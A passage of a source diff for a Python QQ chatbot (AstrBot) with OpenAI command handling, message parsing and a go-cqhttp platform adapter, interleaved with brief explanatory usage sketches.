||||
logger.error(str(e))
|
||||
return msg
|
||||
|
||||
def command_start_with(self, message: str, *args):
|
||||
'''
|
||||
当消息以指定的指令开头时返回True
|
||||
'''
|
||||
for arg in args:
|
||||
if message.startswith(arg) or message.startswith('/'+arg):
|
||||
return True
|
||||
return False
|
||||
|
||||
def update(self, message: str, role: str):
|
||||
if role != "admin":
|
||||
return True, "你没有权限使用该指令", "update"
|
||||
l = message.split(" ")
|
||||
if len(l) == 1:
|
||||
try:
|
||||
update_info = util.updator.check_update()
|
||||
update_info += "\nTips:\n输入「update latest」更新到最新版本\n输入「update <版本号如v3.1.3>」切换到指定版本\n输入「update r」重启机器人\n"
|
||||
return True, update_info, "update"
|
||||
except BaseException as e:
|
||||
return False, "检查更新失败: "+str(e), "update"
|
||||
else:
|
||||
if l[1] == "latest":
|
||||
try:
|
||||
release_data = util.updator.request_release_info()
|
||||
util.updator.update_project(release_data)
|
||||
return True, "更新成功,重启生效。可输入「update r」重启", "update"
|
||||
except BaseException as e:
|
||||
return False, "更新失败: "+str(e), "update"
|
||||
elif l[1] == "r":
|
||||
util.updator._reboot()
|
||||
else:
|
||||
if l[1].lower().startswith('v'):
|
||||
try:
|
||||
release_data = util.updator.request_release_info(
|
||||
latest=False)
|
||||
util.updator.update_project(
|
||||
release_data, latest=False, version=l[1])
|
||||
return True, "更新成功,重启生效。可输入「update r」重启", "update"
|
||||
except BaseException as e:
|
||||
return False, "更新失败: "+str(e), "update"
|
||||
else:
|
||||
return False, "版本号格式错误", "update"
|
||||
|
||||
def reset(self):
|
||||
return False
|
||||
|
||||
def set(self):
|
||||
return False
|
||||
|
||||
def unset(self):
|
||||
return False
|
||||
|
||||
def key(self):
|
||||
return False
|
||||
|
||||
async def help(self):
|
||||
ret = await self.help_messager(self.general_commands(), self.platform, self.global_object.cached_plugins)
|
||||
return True, ret, "help"
|
||||
|
||||
def status(self):
|
||||
return False
|
||||
|
||||
def token(self):
|
||||
return False
|
||||
|
||||
def his(self):
|
||||
return False
|
||||
|
||||
def draw(self):
|
||||
return False
|
||||
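check_command() above accepts two plugin return shapes: a CommandResult object or a legacy (hit, res) tuple. A small sketch of that normalization; the CommandResult class below is a stand-in for illustration only, the real one lives in type.command:

```python
from dataclasses import dataclass
from typing import Any, Tuple

@dataclass
class CommandResult:              # stand-in for type.command.CommandResult
    hit: bool
    result: Any
    def _result_tuple(self) -> Tuple:
        return (self.hit, self.result, "plugin")

def normalize_plugin_result(result):
    # mirrors the branch in check_command(): object form first, tuple form second
    if isinstance(result, CommandResult):
        return result.hit, result._result_tuple()
    if isinstance(result, tuple):
        return result[0], result[1]
    raise TypeError("插件返回值格式错误。")

print(normalize_plugin_result(CommandResult(True, "pong")))   # (True, (True, 'pong', 'plugin'))
print(normalize_plugin_result((True, "pong")))                # (True, 'pong')
```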
model/command/openai_official.py (new file, 256 lines)
@@ -0,0 +1,256 @@
|
||||
from model.command.command import Command
|
||||
from model.provider.openai_official import ProviderOpenAIOfficial, MODELS
|
||||
from util.personality import personalities
|
||||
from type.types import GlobalObject
|
||||
from type.command import CommandItem
|
||||
from SparkleLogging.utils.core import LogManager
|
||||
from logging import Logger
|
||||
from openai._exceptions import NotFoundError
|
||||
|
||||
logger: Logger = LogManager.GetLogger(log_name='astrbot-core')
|
||||
|
||||
class CommandOpenAIOfficial(Command):
|
||||
def __init__(self, provider: ProviderOpenAIOfficial, global_object: GlobalObject):
|
||||
self.provider = provider
|
||||
self.global_object = global_object
|
||||
self.personality_str = ""
|
||||
self.commands = [
|
||||
CommandItem("reset", self.reset, "重置 LLM 会话。", "内置"),
|
||||
CommandItem("his", self.his, "查看与 LLM 的历史记录。", "内置"),
|
||||
CommandItem("status", self.status, "查看 GPT 配置信息和用量状态。", "内置"),
|
||||
]
|
||||
super().__init__(provider, global_object)
|
||||
|
||||
async def check_command(self,
|
||||
message: str,
|
||||
session_id: str,
|
||||
role: str,
|
||||
platform: str,
|
||||
message_obj):
|
||||
self.platform = platform
|
||||
|
||||
# 检查基础指令
|
||||
hit, res = await super().check_command(
|
||||
message,
|
||||
session_id,
|
||||
role,
|
||||
platform,
|
||||
message_obj
|
||||
)
|
||||
|
||||
logger.debug(f"基础指令hit: {hit}, res: {res}")
|
||||
|
||||
# 这里是这个 LLM 的专属指令
|
||||
if hit:
|
||||
return True, res
|
||||
if self.command_start_with(message, "reset", "重置"):
|
||||
return True, await self.reset(session_id, message)
|
||||
elif self.command_start_with(message, "his", "历史"):
|
||||
return True, self.his(message, session_id)
|
||||
elif self.command_start_with(message, "status"):
|
||||
return True, self.status(session_id)
|
||||
elif self.command_start_with(message, "help", "帮助"):
|
||||
return True, await self.help()
|
||||
elif self.command_start_with(message, "unset"):
|
||||
return True, self.unset(session_id)
|
||||
elif self.command_start_with(message, "set"):
|
||||
return True, self.set(message, session_id)
|
||||
elif self.command_start_with(message, "update"):
|
||||
return True, self.update(message, role)
|
||||
elif self.command_start_with(message, "画", "draw"):
|
||||
return True, await self.draw(message)
|
||||
elif self.command_start_with(message, "switch"):
|
||||
return True, await self.switch(message)
|
||||
elif self.command_start_with(message, "models"):
|
||||
return True, await self.print_models()
|
||||
elif self.command_start_with(message, "model"):
|
||||
return True, await self.set_model(message)
|
||||
return False, None
|
||||
|
||||
async def get_models(self):
|
||||
try:
|
||||
models = await self.provider.client.models.list()
|
||||
except NotFoundError as e:
|
||||
bu = str(self.provider.client.base_url)
|
||||
self.provider.client.base_url = bu + "/v1"
|
||||
models = await self.provider.client.models.list()
|
||||
finally:
|
||||
return filter(lambda x: x.id.startswith("gpt"), models.data)
|
||||
|
||||
async def print_models(self):
|
||||
models = await self.get_models()
|
||||
i = 1
|
||||
ret = "OpenAI GPT 类可用模型"
|
||||
for model in models:
|
||||
ret += f"\n{i}. {model.id}"
|
||||
i += 1
|
||||
logger.debug(ret)
|
||||
return True, ret, "models"
|
||||
|
||||
|
||||
async def set_model(self, message: str):
|
||||
l = message.split(" ")
|
||||
if len(l) == 1:
|
||||
return True, "请输入 /model 模型名/编号", "model"
|
||||
model = str(l[1])
|
||||
models = await self.get_models()
|
||||
models = list(models)
|
||||
if model.isdigit() and int(model) <= len(models) and int(model) >= 1:
|
||||
model = models[int(model)-1]
|
||||
else:
|
||||
f = False
|
||||
for m in models:
    if model == m.id:
        model = m
        f = True
        break
|
||||
if not f:
|
||||
return True, "模型不存在或输入非法", "model"
|
||||
|
||||
self.provider.set_model(model.id)
|
||||
return True, f"模型已设置为 {model.id}", "model"
|
||||
|
||||
|
||||
async def help(self):
|
||||
commands = super().general_commands()
|
||||
commands['画'] = '调用 OpenAI DallE 模型生成图片'
|
||||
commands['set'] = '人格设置面板'
|
||||
commands['status'] = '查看 Api Key 状态和配置信息'
|
||||
commands['token'] = '查看本轮会话 token'
|
||||
commands['reset'] = '重置当前与 LLM 的会话,但保留人格(system prompt)'
|
||||
commands['reset p'] = '重置当前与 LLM 的会话,并清除人格。'
|
||||
|
||||
return True, await super().help_messager(commands, self.platform, self.global_object.cached_plugins), "help"
|
||||
|
||||
async def reset(self, session_id: str, message: str = "reset"):
|
||||
if self.provider is None:
|
||||
return False, "未启用 OpenAI 官方 API", "reset"
|
||||
l = message.split(" ")
|
||||
if len(l) == 1:
|
||||
await self.provider.forget(session_id, keep_system_prompt=True)
|
||||
return True, "重置成功", "reset"
|
||||
if len(l) == 2 and l[1] == "p":
    await self.provider.forget(session_id)
    return True, "重置成功", "reset"
|
||||
|
||||
def his(self, message: str, session_id: str):
|
||||
if self.provider is None:
|
||||
return False, "未启用 OpenAI 官方 API", "his"
|
||||
size_per_page = 3
|
||||
page = 1
|
||||
l = message.split(" ")
|
||||
if len(l) == 2:
|
||||
try:
|
||||
page = int(l[1])
|
||||
except BaseException as e:
|
||||
return True, "页码不合法", "his"
|
||||
contexts, total_num = self.provider.dump_contexts_page(session_id, size_per_page, page=page)
|
||||
t_pages = total_num // size_per_page + 1
|
||||
return True, f"历史记录如下:\n{contexts}\n第 {page} 页 | 共 {t_pages} 页\n*输入 /his 2 跳转到第 2 页", "his"
|
||||
|
||||
def status(self, session_id: str):
|
||||
if self.provider is None:
|
||||
return False, "未启用 OpenAI 官方 API", "status"
|
||||
keys_data = self.provider.get_keys_data()
|
||||
ret = "OpenAI Key"
|
||||
for k in keys_data:
|
||||
status = "🟢" if keys_data[k] else "🔴"
|
||||
ret += "\n|- " + k[:8] + " " + status
|
||||
|
||||
conf = self.provider.get_configs()
|
||||
ret += "\n当前模型:" + conf['model']
|
||||
if conf['model'] in MODELS:
|
||||
ret += "\n最大上下文窗口:" + str(MODELS[conf['model']]) + " tokens"
|
||||
|
||||
if session_id in self.provider.session_memory and len(self.provider.session_memory[session_id]):
|
||||
ret += "\n你的会话上下文:" + str(self.provider.session_memory[session_id][-1]['usage_tokens']) + " tokens"
|
||||
|
||||
return True, ret, "status"
|
||||
|
||||
async def switch(self, message: str):
|
||||
'''
|
||||
切换账号
|
||||
'''
|
||||
l = message.split(" ")
|
||||
if len(l) == 1:
|
||||
_, ret, _ = self.status()
|
||||
curr_ = self.provider.get_curr_key()
|
||||
if curr_ is None:
|
||||
ret += "当前您未选择账号。输入/switch <账号序号>切换账号。"
|
||||
else:
|
||||
ret += f"当前您选择的账号为:{curr_[-8:]}。输入/switch <账号序号>切换账号。"
|
||||
return True, ret, "switch"
|
||||
elif len(l) == 2:
|
||||
try:
|
||||
key_stat = self.provider.get_keys_data()
|
||||
index = int(l[1])
|
||||
if index > len(key_stat) or index < 1:
|
||||
return True, "账号序号不合法。", "switch"
|
||||
else:
|
||||
try:
|
||||
new_key = list(key_stat.keys())[index-1]
|
||||
self.provider.set_key(new_key)
|
||||
except BaseException as e:
|
||||
return True, "账号切换失败,原因: " + str(e), "switch"
|
||||
return True, f"账号切换成功。", "switch"
|
||||
except BaseException as e:
|
||||
return True, "未知错误: "+str(e), "switch"
|
||||
else:
|
||||
return True, "参数过多。", "switch"
|
||||
|
||||
def unset(self, session_id: str):
|
||||
if self.provider is None:
|
||||
return False, "未启用 OpenAI 官方 API", "unset"
|
||||
self.provider.curr_personality = {}
|
||||
self.provider.forget(session_id)
|
||||
return True, "已清除人格并重置历史记录。", "unset"
|
||||
|
||||
def set(self, message: str, session_id: str):
|
||||
if self.provider is None:
|
||||
return False, "未启用 OpenAI 官方 API", "set"
|
||||
l = message.split(" ")
|
||||
if len(l) == 1:
|
||||
return True, f"【人格文本由PlexPt开源项目awesome-chatgpt-pr \
|
||||
ompts-zh提供】\n设置人格: \n/set 人格名。例如/set 编剧\n人格列表: /set list\n人格详细信息: \
|
||||
/set view 人格名\n自定义人格: /set 人格文本\n重置会话(清除人格): /reset\n重置会话(保留人格): /reset p\n【当前人格】: {str(self.provider.curr_personality)}", "set"
|
||||
elif l[1] == "list":
|
||||
msg = "人格列表:\n"
|
||||
for key in personalities.keys():
|
||||
msg += f" |-{key}\n"
|
||||
msg += '\n\n*输入/set view 人格名查看人格详细信息'
|
||||
msg += '\n*不定时更新人格库,请及时更新本项目。'
|
||||
return True, msg, "set"
|
||||
elif l[1] == "view":
|
||||
if len(l) == 2:
|
||||
return True, "请输入/set view 人格名", "set"
|
||||
ps = l[2].strip()
|
||||
if ps in personalities:
|
||||
msg = f"人格{ps}的详细信息:\n"
|
||||
msg += f"{personalities[ps]}\n"
|
||||
else:
|
||||
msg = f"人格{ps}不存在"
|
||||
return True, msg, "set"
|
||||
else:
|
||||
ps = l[1].strip()
|
||||
if ps in personalities:
|
||||
self.provider.curr_personality = {
|
||||
'name': ps,
|
||||
'prompt': personalities[ps]
|
||||
}
|
||||
self.provider.personality_set(ps, session_id)
|
||||
return True, f"人格{ps}已设置。", "set"
|
||||
else:
|
||||
self.provider.curr_personality = {
|
||||
'name': '自定义人格',
|
||||
'prompt': ps
|
||||
}
|
||||
self.provider.personality_set(ps, session_id)
|
||||
return True, f"自定义人格已设置。 \n人格信息: {ps}", "set"
|
||||
|
||||
async def draw(self, message: str):
|
||||
if self.provider is None:
|
||||
return False, "未启用 OpenAI 官方 API", "draw"
|
||||
if message.startswith("/画"):
|
||||
message = message[2:]
|
||||
elif message.startswith("画"):
|
||||
message = message[1:]
|
||||
img_url = await self.provider.image_generate(message)
|
||||
return True, img_url, "draw"
|
||||
110
model/platform/_message_parse.py
Normal file
@@ -0,0 +1,110 @@
|
||||
from nakuru.entities.components import Plain, At, Image, BaseMessageComponent
|
||||
from nakuru import (
|
||||
GuildMessage,
|
||||
GroupMessage,
|
||||
FriendMessage
|
||||
)
|
||||
import botpy.message
|
||||
from type.message import *
|
||||
from typing import List, Union
|
||||
import time
|
||||
|
||||
# QQ官方消息类型转换
|
||||
|
||||
|
||||
def qq_official_message_parse(message: List[BaseMessageComponent]):
|
||||
plain_text = ""
|
||||
image_path = None # only one img supported
|
||||
for i in message:
|
||||
if isinstance(i, Plain):
|
||||
plain_text += i.text
|
||||
elif isinstance(i, Image) and image_path == None:
|
||||
if i.path is not None:
|
||||
image_path = i.path
|
||||
else:
|
||||
image_path = i.file
|
||||
return plain_text, image_path
|
||||
|
||||
# QQ官方消息类型 2 AstrBotMessage
|
||||
|
||||
|
||||
def qq_official_message_parse_rev(message: Union[botpy.message.Message, botpy.message.GroupMessage],
|
||||
message_type: MessageType) -> AstrBotMessage:
|
||||
abm = AstrBotMessage()
|
||||
abm.type = message_type
|
||||
abm.timestamp = int(time.time())
|
||||
abm.raw_message = message
|
||||
abm.message_id = message.id
|
||||
abm.tag = "qqchan"
|
||||
msg: List[BaseMessageComponent] = []
|
||||
|
||||
if message_type == MessageType.GROUP_MESSAGE:
|
||||
abm.sender = MessageMember(
|
||||
message.author.member_openid,
|
||||
""
|
||||
)
|
||||
abm.message_str = message.content.strip()
|
||||
abm.self_id = "unknown_selfid"
|
||||
|
||||
msg.append(Plain(abm.message_str))
|
||||
if message.attachments:
|
||||
for i in message.attachments:
|
||||
if i.content_type.startswith("image"):
|
||||
url = i.url
|
||||
if not url.startswith("http"):
|
||||
url = "https://"+url
|
||||
img = Image.fromURL(url)
|
||||
msg.append(img)
|
||||
abm.message = msg
|
||||
|
||||
elif message_type == MessageType.GUILD_MESSAGE or message_type == MessageType.FRIEND_MESSAGE:
|
||||
# 目前对于 FRIEND_MESSAGE 只处理频道私聊
|
||||
try:
|
||||
abm.self_id = str(message.mentions[0].id)
|
||||
except:
|
||||
abm.self_id = ""
|
||||
|
||||
plain_content = message.content.replace(
|
||||
"<@!"+str(abm.self_id)+">", "").strip()
|
||||
msg.append(Plain(plain_content))
|
||||
if message.attachments:
|
||||
for i in message.attachments:
|
||||
if i.content_type.startswith("image"):
|
||||
url = i.url
|
||||
if not url.startswith("http"):
|
||||
url = "https://"+url
|
||||
img = Image.fromURL(url)
|
||||
msg.append(img)
|
||||
abm.message = msg
|
||||
abm.message_str = plain_content
|
||||
abm.sender = MessageMember(
|
||||
str(message.author.id),
|
||||
str(message.author.username)
|
||||
)
|
||||
else:
|
||||
raise ValueError(f"Unknown message type: {message_type}")
|
||||
return abm
|
||||
|
||||
|
||||
def nakuru_message_parse_rev(message: Union[GuildMessage, GroupMessage, FriendMessage]) -> AstrBotMessage:
|
||||
abm = AstrBotMessage()
|
||||
abm.type = MessageType(message.type)
|
||||
abm.timestamp = int(time.time())
|
||||
abm.raw_message = message
|
||||
abm.message_id = message.message_id
|
||||
|
||||
plain_content = ""
|
||||
for i in message.message:
|
||||
if isinstance(i, Plain):
|
||||
plain_content += i.text
|
||||
abm.message_str = plain_content
|
||||
|
||||
abm.self_id = str(message.self_id)
|
||||
abm.sender = MessageMember(
|
||||
str(message.sender.user_id),
|
||||
str(message.sender.nickname)
|
||||
)
|
||||
abm.tag = "gocq"
|
||||
abm.message = message.message
|
||||
|
||||
return abm
|
||||
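To illustrate the converter above, here is a minimal sketch of feeding a nakuru-style component list through qq_official_message_parse. The chain contents are invented for the example; only the Plain and Image components from nakuru are assumed.

from nakuru.entities.components import Plain, Image
from model.platform._message_parse import qq_official_message_parse

# hypothetical outgoing chain: some text plus one image
chain = [
    Plain(text="看看这张图"),
    Image.fromURL("https://example.com/cat.jpg"),  # placeholder URL
]

plain_text, image_path = qq_official_message_parse(chain)
# plain_text == "看看这张图"
# image_path is the image's `path` if set, otherwise its `file` field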
9
model/platform/_message_result.py
Normal file
@@ -0,0 +1,9 @@
from dataclasses import dataclass
from typing import Union, Optional


@dataclass
class MessageResult():
    result_message: Union[str, list]
    is_command_call: Optional[bool] = False
    callback: Optional[callable] = None
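A small usage sketch of the MessageResult dataclass defined above; the reply text and the callback are hypothetical, and the commented-out lines only mirror how the platform adapters below consume the result.

from model.platform._message_result import MessageResult

def _after_reply():
    # hypothetical callback, e.g. flush statistics once the reply is delivered
    print("reply delivered")

result = MessageResult(
    result_message="帮助信息……",   # placeholder reply text
    is_command_call=True,
    callback=_after_reply,
)

# a platform adapter then roughly does:
#   await platform.reply_msg(message, result.result_message)
#   if result.callback is not None:
#       result.callback()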
67
model/platform/_platfrom.py
Normal file
@@ -0,0 +1,67 @@
|
||||
import abc
|
||||
from typing import Union
|
||||
from nakuru import (
|
||||
GuildMessage,
|
||||
GroupMessage,
|
||||
FriendMessage,
|
||||
)
|
||||
from nakuru.entities.components import Plain, At, Image
|
||||
|
||||
|
||||
class Platform():
|
||||
def __init__(self, message_handler: callable) -> None:
|
||||
'''
|
||||
初始化平台的各种接口
|
||||
'''
|
||||
self.message_handler = message_handler
|
||||
pass
|
||||
|
||||
@abc.abstractmethod
|
||||
async def handle_msg():
|
||||
'''
|
||||
处理到来的消息
|
||||
'''
|
||||
pass
|
||||
|
||||
@abc.abstractmethod
|
||||
async def reply_msg():
|
||||
'''
|
||||
回复消息(被动发送)
|
||||
'''
|
||||
pass
|
||||
|
||||
@abc.abstractmethod
|
||||
async def send_msg(target: Union[GuildMessage, GroupMessage, FriendMessage, str], message: Union[str, list]):
|
||||
'''
|
||||
发送消息(主动发送)
|
||||
'''
|
||||
pass
|
||||
|
||||
@abc.abstractmethod
|
||||
async def send(target: Union[GuildMessage, GroupMessage, FriendMessage, str], message: Union[str, list]):
|
||||
'''
|
||||
发送消息(主动发送)同 send_msg()
|
||||
'''
|
||||
pass
|
||||
|
||||
def parse_message_outline(self, message: Union[GuildMessage, GroupMessage, FriendMessage, str, list]) -> str:
|
||||
'''
|
||||
将消息解析成大纲消息形式。
|
||||
如: xxxxx[图片]xxxxx
|
||||
'''
|
||||
if isinstance(message, str):
|
||||
return message
|
||||
ret = ''
|
||||
ls_to_parse = message if isinstance(message, list) else message.message
|
||||
try:
|
||||
for node in ls_to_parse:
|
||||
if isinstance(node, Plain):
|
||||
ret += node.text
|
||||
elif isinstance(node, At):
|
||||
ret += f'[At: {node.name}/{node.qq}]'
|
||||
elif isinstance(node, Image):
|
||||
ret += '[图片]'
|
||||
except Exception as e:
|
||||
pass
|
||||
ret = ret.replace('\n', '')
|
||||
return ret
|
||||
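To make the abstract contract above concrete, a minimal sketch of a Platform subclass. EchoPlatform, the 'echo' platform tag and the way it prints replies are purely illustrative; the message_handler call mirrors how the real adapters below use it, and message.session_id is assumed to be filled in by the adapter.

from model.platform._platfrom import Platform
from type.message import AstrBotMessage

class EchoPlatform(Platform):
    '''Illustrative adapter: echoes whatever the message handler returns.'''

    async def handle_msg(self, message: AstrBotMessage):
        # hand the message to the shared handler; it returns a MessageResult or None
        result = await self.message_handler(
            message=message,
            session_id=message.session_id,
            role='member',
            platform='echo',   # hypothetical platform tag
        )
        if result is not None:
            await self.reply_msg(message, result.result_message)

    async def reply_msg(self, message: AstrBotMessage, result_message):
        # a real adapter would call the chat platform's send API here
        print(self.parse_message_outline(result_message))

    async def send_msg(self, target, message):
        await self.reply_msg(target, message)

    async def send(self, target, message):
        await self.send_msg(target, message)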
320
model/platform/qq_gocq.py
Normal file
@@ -0,0 +1,320 @@
|
||||
from nakuru.entities.components import Plain, At, Image, Node
|
||||
from util import general_utils as gu
|
||||
from util.cmd_config import CmdConfig
|
||||
import asyncio
|
||||
from nakuru import (
|
||||
CQHTTP,
|
||||
GuildMessage,
|
||||
GroupMessage,
|
||||
FriendMessage,
|
||||
GroupMemberIncrease,
|
||||
Notify
|
||||
)
|
||||
from typing import Union
|
||||
import time
|
||||
|
||||
from ._platfrom import Platform
|
||||
from ._message_parse import nakuru_message_parse_rev
|
||||
from type.message import *
|
||||
from SparkleLogging.utils.core import LogManager
|
||||
from logging import Logger
|
||||
|
||||
logger: Logger = LogManager.GetLogger(log_name='astrbot-core')
|
||||
|
||||
|
||||
class FakeSource:
|
||||
def __init__(self, type, group_id):
|
||||
self.type = type
|
||||
self.group_id = group_id
|
||||
|
||||
|
||||
class QQGOCQ(Platform):
|
||||
def __init__(self, cfg: dict, message_handler: callable, global_object) -> None:
|
||||
super().__init__(message_handler)
|
||||
|
||||
self.loop = asyncio.new_event_loop()
|
||||
asyncio.set_event_loop(self.loop)
|
||||
|
||||
self.waiting = {}
|
||||
self.cc = CmdConfig()
|
||||
self.cfg = cfg
|
||||
|
||||
try:
|
||||
self.nick_qq = cfg['nick_qq']
|
||||
except:
|
||||
self.nick_qq = ["ai", "!", "!"]
|
||||
nick_qq = self.nick_qq
|
||||
if isinstance(nick_qq, str):
|
||||
nick_qq = [nick_qq]
|
||||
|
||||
self.unique_session = cfg['uniqueSessionMode']
|
||||
self.pic_mode = cfg['qq_pic_mode']
|
||||
|
||||
self.client = CQHTTP(
|
||||
host=self.cc.get("gocq_host", "127.0.0.1"),
|
||||
port=self.cc.get("gocq_websocket_port", 6700),
|
||||
http_port=self.cc.get("gocq_http_port", 5700),
|
||||
)
|
||||
gocq_app = self.client
|
||||
|
||||
self.announcement = self.cc.get("announcement", "欢迎新人!")
|
||||
|
||||
@gocq_app.receiver("GroupMessage")
|
||||
async def _(app: CQHTTP, source: GroupMessage):
|
||||
if self.cc.get("gocq_react_group", True):
|
||||
abm = nakuru_message_parse_rev(source)
|
||||
if isinstance(source.message[0], Plain):
|
||||
await self.handle_msg(abm)
|
||||
elif isinstance(source.message[0], At):
|
||||
if source.message[0].qq == source.self_id:
|
||||
await self.handle_msg(abm)
|
||||
else:
|
||||
return
|
||||
|
||||
@gocq_app.receiver("FriendMessage")
|
||||
async def _(app: CQHTTP, source: FriendMessage):
|
||||
if self.cc.get("gocq_react_friend", True):
|
||||
abm = nakuru_message_parse_rev(source)
|
||||
if isinstance(source.message[0], Plain):
|
||||
await self.handle_msg(abm)
|
||||
else:
|
||||
return
|
||||
|
||||
@gocq_app.receiver("GroupMemberIncrease")
|
||||
async def _(app: CQHTTP, source: GroupMemberIncrease):
|
||||
if self.cc.get("gocq_react_group_increase", True):
|
||||
await app.sendGroupMessage(source.group_id, [
|
||||
Plain(text=self.announcement)
|
||||
])
|
||||
|
||||
# @gocq_app.receiver("Notify")
|
||||
# async def _(app: CQHTTP, source: Notify):
|
||||
# print(source)
|
||||
# if source.sub_type == "poke" and source.target_id == source.self_id:
|
||||
# await self.handle_msg(source)
|
||||
|
||||
@gocq_app.receiver("GuildMessage")
|
||||
async def _(app: CQHTTP, source: GuildMessage):
|
||||
if self.cc.get("gocq_react_guild", True):
|
||||
abm = nakuru_message_parse_rev(source)
|
||||
if isinstance(source.message[0], Plain):
|
||||
await self.handle_msg(abm)
|
||||
elif isinstance(source.message[0], At):
|
||||
if source.message[0].qq == source.self_tiny_id:
|
||||
await self.handle_msg(abm)
|
||||
else:
|
||||
return
|
||||
|
||||
def run(self):
|
||||
self.client.run()
|
||||
|
||||
async def handle_msg(self, message: AstrBotMessage):
|
||||
logger.info(
|
||||
f"{message.sender.nickname}/{message.sender.user_id} -> {self.parse_message_outline(message)}")
|
||||
|
||||
assert isinstance(message.raw_message,
|
||||
(GroupMessage, FriendMessage, GuildMessage))
|
||||
is_group = message.type != MessageType.FRIEND_MESSAGE
|
||||
|
||||
# 判断是否响应消息
|
||||
resp = False
|
||||
if not is_group:
|
||||
resp = True
|
||||
else:
|
||||
for i in message.message:
|
||||
if isinstance(i, At):
|
||||
if message.type.value == "GuildMessage":
|
||||
if str(i.qq) == str(message.raw_message.user_id) or str(i.qq) == str(message.raw_message.self_tiny_id):
|
||||
resp = True
|
||||
if message.type.value == "FriendMessage":
|
||||
if str(i.qq) == str(message.self_id):
|
||||
resp = True
|
||||
if message.type.value == "GroupMessage":
|
||||
if str(i.qq) == str(message.self_id):
|
||||
resp = True
|
||||
elif isinstance(i, Plain):
|
||||
for nick in self.nick_qq:
|
||||
if nick != '' and i.text.strip().startswith(nick):
|
||||
resp = True
|
||||
break
|
||||
|
||||
if not resp:
|
||||
return
|
||||
|
||||
# 解析 session_id
|
||||
if self.unique_session or not is_group:
|
||||
session_id = message.raw_message.user_id
|
||||
elif message.type == MessageType.GROUP_MESSAGE:
|
||||
session_id = message.raw_message.group_id
|
||||
elif message.type == MessageType.GUILD_MESSAGE:
|
||||
session_id = message.raw_message.channel_id
|
||||
else:
|
||||
session_id = message.raw_message.user_id
|
||||
|
||||
message.session_id = session_id
|
||||
|
||||
# 解析 role
|
||||
sender_id = str(message.raw_message.user_id)
|
||||
if sender_id == self.cc.get('admin_qq', '') or \
|
||||
sender_id in self.cc.get('other_admins', []):
|
||||
role = 'admin'
|
||||
else:
|
||||
role = 'member'
|
||||
|
||||
message_result = await self.message_handler(
|
||||
message=message,
|
||||
session_id=session_id,
|
||||
role=role,
|
||||
platform='gocq'
|
||||
)
|
||||
|
||||
if message_result is None:
|
||||
return
|
||||
await self.reply_msg(message, message_result.result_message)
|
||||
if message_result.callback is not None:
|
||||
message_result.callback()
|
||||
|
||||
# 如果是等待回复的消息
|
||||
if session_id in self.waiting and self.waiting[session_id] == '':
|
||||
self.waiting[session_id] = message
|
||||
|
||||
async def reply_msg(self,
|
||||
message: Union[AstrBotMessage, GuildMessage, GroupMessage, FriendMessage],
|
||||
result_message: list):
|
||||
"""
|
||||
插件开发者请使用send方法, 可以不用直接调用这个方法。
|
||||
"""
|
||||
if isinstance(message, AstrBotMessage):
|
||||
source = message.raw_message
|
||||
else:
|
||||
source = message
|
||||
|
||||
res = result_message
|
||||
|
||||
logger.info(
|
||||
f"{source.user_id} <- {self.parse_message_outline(res)}")
|
||||
|
||||
if isinstance(source, int):
|
||||
source = FakeSource("GroupMessage", source)
|
||||
|
||||
# str convert to CQ Message Chain
|
||||
if isinstance(res, str):
|
||||
res_str = res
|
||||
res = []
|
||||
if source.type == "GroupMessage" and not isinstance(source, FakeSource):
|
||||
res.append(At(qq=source.user_id))
|
||||
res.append(Plain(text=res_str))
|
||||
|
||||
# if image mode, put all Plain texts into a new picture.
|
||||
if self.pic_mode and isinstance(res, list):
|
||||
plains = []
|
||||
news = []
|
||||
for i in res:
|
||||
if isinstance(i, Plain):
|
||||
plains.append(i.text)
|
||||
else:
|
||||
news.append(i)
|
||||
plains_str = "".join(plains).strip()
|
||||
if plains_str != "" and len(plains_str) > 50:
|
||||
p = gu.create_markdown_image("".join(plains))
|
||||
news.append(Image.fromFileSystem(p))
|
||||
res = news
|
||||
|
||||
# 回复消息链
|
||||
if isinstance(res, list) and len(res) > 0:
|
||||
if source.type == "GuildMessage":
|
||||
await self.client.sendGuildChannelMessage(source.guild_id, source.channel_id, res)
|
||||
return
|
||||
elif source.type == "FriendMessage":
|
||||
await self.client.sendFriendMessage(source.user_id, res)
|
||||
return
|
||||
elif source.type == "GroupMessage":
|
||||
# 过长时forward发送
|
||||
plain_text_len = 0
|
||||
image_num = 0
|
||||
for i in res:
|
||||
if isinstance(i, Plain):
|
||||
plain_text_len += len(i.text)
|
||||
elif isinstance(i, Image):
|
||||
image_num += 1
|
||||
if plain_text_len > self.cc.get('qq_forward_threshold', 200):
|
||||
# 删除At
|
||||
for i in res:
|
||||
if isinstance(i, At):
|
||||
res.remove(i)
|
||||
node = Node(res)
|
||||
# node.content = res
|
||||
node.uin = 123456
|
||||
node.name = f"bot"
|
||||
node.time = int(time.time())
|
||||
# print(node)
|
||||
nodes = [node]
|
||||
await self.client.sendGroupForwardMessage(source.group_id, nodes)
|
||||
return
|
||||
await self.client.sendGroupMessage(source.group_id, res)
|
||||
return
|
||||
|
||||
async def send_msg(self, message: Union[GroupMessage, FriendMessage, GuildMessage, AstrBotMessage], result_message: list):
|
||||
'''
|
||||
提供给插件的发送QQ消息接口。
|
||||
参数说明:第一个参数可以是消息对象,也可以是QQ群号。第二个参数是消息内容(消息内容可以是消息链列表,也可以是纯文字信息)。
|
||||
'''
|
||||
try:
|
||||
await self.reply_msg(message, result_message)
|
||||
except BaseException as e:
|
||||
raise e
|
||||
|
||||
async def send(self,
|
||||
to,
|
||||
res):
|
||||
'''
|
||||
同 send_msg()
|
||||
'''
|
||||
await self.reply_msg(to, res)
|
||||
|
||||
def create_text_image(self, title: str, text: str, max_width=30, font_size=20):
|
||||
'''
|
||||
文本转图片。
|
||||
title: 标题
|
||||
text: 文本内容
|
||||
max_width: 文本宽度最大值(默认30)
|
||||
font_size: 字体大小(默认20)
|
||||
|
||||
返回:文件路径
|
||||
'''
|
||||
try:
|
||||
img = gu.word2img(title, text, max_width, font_size)
|
||||
p = gu.save_temp_img(img)
|
||||
return p
|
||||
except Exception as e:
|
||||
raise e
|
||||
|
||||
def wait_for_message(self, group_id) -> Union[GroupMessage, FriendMessage, GuildMessage]:
|
||||
'''
|
||||
等待下一条消息,超时 300s 后抛出异常
|
||||
'''
|
||||
self.waiting[group_id] = ''
|
||||
cnt = 0
|
||||
while True:
|
||||
if group_id in self.waiting and self.waiting[group_id] != '':
|
||||
# 去掉
|
||||
ret = self.waiting[group_id]
|
||||
del self.waiting[group_id]
|
||||
return ret
|
||||
cnt += 1
|
||||
if cnt > 300:
|
||||
raise Exception("等待消息超时。")
|
||||
time.sleep(1)
|
||||
